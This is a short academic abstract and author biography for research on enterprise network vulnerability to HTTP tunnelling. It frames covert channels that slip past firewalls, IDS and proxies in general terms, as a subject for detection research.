Enterprise Network Vulnerability to HTTP Tunnelling
Dr. Scott Knight
ABSTRACT
It has been understood for some time that arbitrary data, including the
communications associated with malicious backdoors and Trojan horses, can
be tunnelled by subverting the HTTP protocol. Although there are a
number of demonstration programs openly available, the risks associated
with this vulnerability have not been characterised in the literature.
This research investigates the nature of the vulnerability and the
efficacy of contemporary network defence strategies such as firewall
technology, intrusion detection systems, HTTP caching and proxying, and
network address translation. All of these techniques are quite easily
circumvented by HTTP tunnelling strategies. Web traffic also forms a
large portion of the traffic crossing network boundaries, which makes the
HTTP protocol an attractive target for subversion. This research explores
techniques that may be used to hide malicious traffic in what seems to be
legitimate HTTP traffic originating from within the protected network. A
covert channel can provide external control of a computer on the
protected network from a machine anywhere on the Internet. The
techniques explored by this project are used in parallel research
projects to detect such malicious tunnel traffic and validate new
intrusion detection technology.
BIOGRAPHY
Scott Knight is an Assistant Professor in the Department of Electrical
and Computer Engineering at the Royal Military College of Canada. Dr
Knight has worked with the National Defence Intelligence and Security
communities on the development of secure computing networks. He has
founded the Computer Security Laboratory at RMC, a research group he
continues to lead. This research group has a close working relationship
with the Canadian Forces Information Operations Group and focuses on
computer network defence and support to information operations.